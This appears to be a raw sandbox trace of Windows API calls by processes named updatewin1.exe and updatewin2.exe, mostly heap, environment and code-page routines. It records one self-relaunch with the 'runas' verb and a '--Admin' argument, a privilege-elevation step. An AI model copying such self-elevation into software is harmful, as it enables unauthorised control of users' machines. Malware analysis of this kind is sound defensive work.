lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿlÇø\x12Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0129.666] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x80) returned 0x2ca0d0 [0129.666] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe")) returned 0x5f [0129.666] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xc8) returned 0x2cc160 [0129.666] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0129.666] GetLastError () returned 0x0 [0129.666] GetEnvironmentStringsW () returned 0x2cc230* [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xaca) returned 0x2ccd08 [0129.667] FreeEnvironmentStringsW (penv=0x2cc230) returned 1 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x98) returned 0x2cc230 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3e) returned 0x2cd7f8 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x6c) returned 0x2cc2d0 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x6e) returned 0x2cc348 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x78) returned 0x2b1180 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x62) returned 0x2cc3c0 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2e) returned 0x2b52d0 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x48) returned 0x2cc430 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x28) returned 0x2ca158 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1a) returned 0x2cbd10 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x4a) returned 0x2cc480 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x72) returned 0x2b1200 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x30) returned 0x2b5308 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2e) returned 0x2b5340 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1c) returned 0x2cbd38 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xd2) returned 0x2cc4d8 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x7c) returned 0x2cc5b8 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x36) returned 0x2cc640 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3a) returned 0x2cd840 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x90) returned 0x2cc680 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x24) returned 0x2cc718 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x30) returned 0x2b5378 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x36) returned 0x2cc748 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x48) returned 0x2cc788 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x52) returned 0x2cc7d8 [0129.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3c) returned 0x2cd888 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x82) returned 0x2cc838 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2e) returned 0x2b53b0 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1e) returned 0x2cbd60 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2c) returned 0x2b53e8 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x54) returned 0x2cc8c8 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x52) returned 0x2cc928 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2a) returned 0x2b5420 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3c) returned 0x2cd8d0 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x54) returned 0x2cc988 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x24) returned 0x2cc9e8 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x30) returned 0x2b5458 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x8c) returned 0x2cca18 [0129.668] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ccd08 | out: hHeap=0x2a0000) returned 1 [0129.668] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x800) returned 0x2ccab0 [0129.669] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0129.669] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0129.679] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0129.680] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" " [0129.680] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" ", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x2cd2b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" [0129.681] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc0) returned 0x2cd388 [0129.681] lstrcpyW (in: lpString1=0x18e5a0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" [0129.681] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594") returned 1 [0129.681] lstrcpyW (in: lpString1=0x18eda0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0129.681] ShellExecuteExW (in: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0130.127] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2cd388 | out: hHeap=0x2a0000) returned 1 [0130.127] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0130.128] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0130.128] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ca0d0 | out: hHeap=0x2a0000) returned 1 [0130.128] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ccab0 | out: hHeap=0x2a0000) returned 1 [0130.128] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0130.128] GetLastError () returned 0x57 [0130.128] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f56c | out: phModule=0x18f56c) returned 0 [0130.128] ExitProcess (uExitCode=0x0) [0130.129] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ca9e8 | out: hHeap=0x2a0000) returned 1 [0130.131] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 91 os_tid = 0x358 Thread: id = 92 os_tid = 0x5b8 Thread: id = 93 os_tid = 0x488 Thread: id = 94 os_tid = 0x320 Process: id = "8" image_name = "updatewin2.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe" page_root = "0x3dbca000" os_pid = "0x91c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x958" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 90 os_tid = 0x35c [0129.049] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xc27eba70, dwHighDateTime=0x1d62438)) [0129.050] GetCurrentProcessId () returned 0x91c [0129.050] GetCurrentThreadId () returned 0x35c [0129.050] GetTickCount () returned 0x11548a5 [0129.050] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=24945598140) returned 1 [0129.069] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0129.069] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2b0000 [0129.071] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0129.071] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0129.072] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0129.072] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0129.072] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0129.072] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0129.072] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0129.072] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0129.073] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0129.073] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0129.073] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0129.073] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0129.073] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0129.073] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0129.073] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0129.073] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0129.074] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0129.074] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0129.074] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0129.074] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0129.074] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0129.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x214) returned 0x2b07d0 [0129.075] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0129.075] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0129.075] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0129.075] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0129.075] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0129.075] GetCurrentThreadId () returned 0x35c [0129.075] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0129.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x2b09f0 [0129.076] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0129.076] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0129.076] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.076] SetHandleCount (uNumber=0x20) returned 0x20 [0129.076] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe\" " [0129.076] GetEnvironmentStringsW () returned 0x5d4e70* [0129.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0129.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x565) returned 0x2b11f8 [0129.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2b11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0129.076] FreeEnvironmentStringsW (penv=0x5d4e70) returned 1 [0129.076] GetLastError () returned 0x0 [0129.076] SetLastError (dwErrCode=0x0) [0129.076] GetLastError () returned 0x0 [0129.077] SetLastError (dwErrCode=0x0) [0129.077] GetLastError () returned 0x0 [0129.077] SetLastError (dwErrCode=0x0) [0129.077] GetACP () returned 0x4e4 [0129.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x220) returned 0x2b1768 [0129.077] GetLastError () returned 0x0 [0129.077] SetLastError (dwErrCode=0x0) [0129.077] IsValidCodePage (CodePage=0x4e4) returned 1 [0129.077] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0129.077] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0129.077] GetLastError () returned 0x0 [0129.077] SetLastError (dwErrCode=0x0) [0129.077] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0129.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0129.077] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0129.077] GetLastError () returned 0x0 [0129.077] SetLastError (dwErrCode=0x0) [0129.077] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0129.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ挙ฑ㞅AĀ") returned 256 [0129.077] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ挙ฑ㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0129.077] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ挙ฑ㞅AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0129.077] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ 